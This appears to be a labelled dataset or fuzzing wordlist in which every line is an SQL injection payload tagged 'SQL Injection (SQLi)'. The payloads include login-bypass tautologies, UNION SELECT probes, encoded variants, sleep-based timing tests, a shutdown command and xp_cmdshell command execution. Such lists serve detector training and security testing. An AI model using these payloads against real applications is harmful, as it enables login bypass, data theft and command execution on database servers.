':::SQL Injection (SQLi)
":::SQL Injection (SQLi)
#:::SQL Injection (SQLi)
-:::SQL Injection (SQLi)
--:::SQL Injection (SQLi)
' --:::SQL Injection (SQLi)
--';:::SQL Injection (SQLi)
' ;:::SQL Injection (SQLi)
= ':::SQL Injection (SQLi)
= ;:::SQL Injection (SQLi)
= --:::SQL Injection (SQLi)
\x23:::SQL Injection (SQLi)
\x27:::SQL Injection (SQLi)
\x3D \x3B':::SQL Injection (SQLi)
\x3D \x27:::SQL Injection (SQLi)
\x27\x4F\x52 SELECT *:::SQL Injection (SQLi)
\x27\x6F\x72 SELECT *:::SQL Injection (SQLi)
'or select *:::SQL Injection (SQLi)
admin'--:::SQL Injection (SQLi)
';shutdown--:::SQL Injection (SQLi)
<>"'%;)(&+:::SQL Injection (SQLi)
' or ''=':::SQL Injection (SQLi)
' or 'x'='x:::SQL Injection (SQLi)
" or "x"="x:::SQL Injection (SQLi)
') or ('x'='x:::SQL Injection (SQLi)
0 or 1=1:::SQL Injection (SQLi)
' or 0=0 --:::SQL Injection (SQLi)
" or 0=0 --:::SQL Injection (SQLi)
or 0=0 --:::SQL Injection (SQLi)
' or 0=0 #:::SQL Injection (SQLi)
" or 0=0 #:::SQL Injection (SQLi)
or 0=0 #:::SQL Injection (SQLi)
' or 1=1--:::SQL Injection (SQLi)
blah' or 1=1--:::SQL Injection (SQLi)
blah' or 1=1;--:::SQL Injection (SQLi)
blah' or 1=1; --:::SQL Injection (SQLi)
blah' OR ''=':::SQL Injection (SQLi)
blah' OR "=':::SQL Injection (SQLi)
blah' OR 'x'='x';#:::SQL Injection (SQLi)
" or 1=1--:::SQL Injection (SQLi)
' or '1'='1'--:::SQL Injection (SQLi)
"' or 1 --'":::SQL Injection (SQLi)
or 1=1--:::SQL Injection (SQLi)
or%201=1:::SQL Injection (SQLi)
or%201=1 --:::SQL Injection (SQLi)
' or 1=1 or ''=':::SQL Injection (SQLi)
" or 1=1 or ""=":::SQL Injection (SQLi)
' or a=a--:::SQL Injection (SQLi)
" or "a"="a:::SQL Injection (SQLi)
') or ('a'='a:::SQL Injection (SQLi)
") or ("a"="a:::SQL Injection (SQLi)
hi" or "a"="a:::SQL Injection (SQLi)
hi" or 1=1 --:::SQL Injection (SQLi)
hi' or 1=1 --:::SQL Injection (SQLi)
hi' or 'a'='a:::SQL Injection (SQLi)
hi') or ('a'='a:::SQL Injection (SQLi)
hi") or ("a"="a:::SQL Injection (SQLi)
'hi' or 'x'='x';:::SQL Injection (SQLi)
' or 1=1 or ''=':::SQL Injection (SQLi)
x' or 1=1 or 'x'='y:::SQL Injection (SQLi)
@variable:::SQL Injection (SQLi)
,@variable:::SQL Injection (SQLi)
PRINT:::SQL Injection (SQLi)
PRINT @@variable:::SQL Injection (SQLi)
select:::SQL Injection (SQLi)
insert:::SQL Injection (SQLi)
as:::SQL Injection (SQLi)
or:::SQL Injection (SQLi)
procedure:::SQL Injection (SQLi)
limit:::SQL Injection (SQLi)
order by:::SQL Injection (SQLi)
asc:::SQL Injection (SQLi)
desc:::SQL Injection (SQLi)
delete:::SQL Injection (SQLi)
update:::SQL Injection (SQLi)
distinct:::SQL Injection (SQLi)
having:::SQL Injection (SQLi)
truncate:::SQL Injection (SQLi)
replace:::SQL Injection (SQLi)
like:::SQL Injection (SQLi)
handler:::SQL Injection (SQLi)
bfilename:::SQL Injection (SQLi)
' or username like '%:::SQL Injection (SQLi)
' or uname like '%:::SQL Injection (SQLi)
' or userid like '%:::SQL Injection (SQLi)
exec xp:::SQL Injection (SQLi)
exec sp:::SQL Injection (SQLi)
'; exec master..xp_cmdshell:::SQL Injection (SQLi)
'; exec xp_regread:::SQL Injection (SQLi)
t'exec master..xp_cmdshell 'nslookup www.google.com'--:::SQL Injection (SQLi)
--sp_password:::SQL Injection (SQLi)
\x27UNION SELECT:::SQL Injection (SQLi)
' UNION SELECT:::SQL Injection (SQLi)
' UNION ALL SELECT:::SQL Injection (SQLi)
' or (EXISTS):::SQL Injection (SQLi)
' (select top 1:::SQL Injection (SQLi)
'||UTL_HTTP.REQUEST:::SQL Injection (SQLi)
1;SELECT%20*:::SQL Injection (SQLi)
to_timestamp_tz:::SQL Injection (SQLi)
tz_offset:::SQL Injection (SQLi)
&lt;&gt;&quot;'%;)(&amp;+:::SQL Injection (SQLi)
'%20or%201=1:::SQL Injection (SQLi)
%27%20or%201=1:::SQL Injection (SQLi)
%20$(sleep%2050):::SQL Injection (SQLi)
%20'sleep%2050':::SQL Injection (SQLi)
char%4039%41%2b%40SELECT:::SQL Injection (SQLi)
&apos;%20OR:::SQL Injection (SQLi)
'sqlattempt1:::SQL Injection (SQLi)
(sqlattempt2):::SQL Injection (SQLi)
blah' ORDER BY 1;:::SQL Injection (SQLi)
blah' ORDER BY 2;:::SQL Injection (SQLi)
blah' ORDER BY 3;:::SQL Injection (SQLi)
blah' ORDER BY 1;#:::SQL Injection (SQLi)
blah' ORDER BY 2;#:::SQL Injection (SQLi)
blah' ORDER BY 3;#:::SQL Injection (SQLi)
blah' OR firstname IS NULL;#:::SQL Injection (SQLi)
blah' OR firstname = ''=':::SQL Injection (SQLi)
blah' OR firstname = ''='#:::SQL Injection (SQLi)
blah' OR first_name IS NULL;#:::SQL Injection (SQLi)
blah' OR first_name = ''=':::SQL Injection (SQLi)
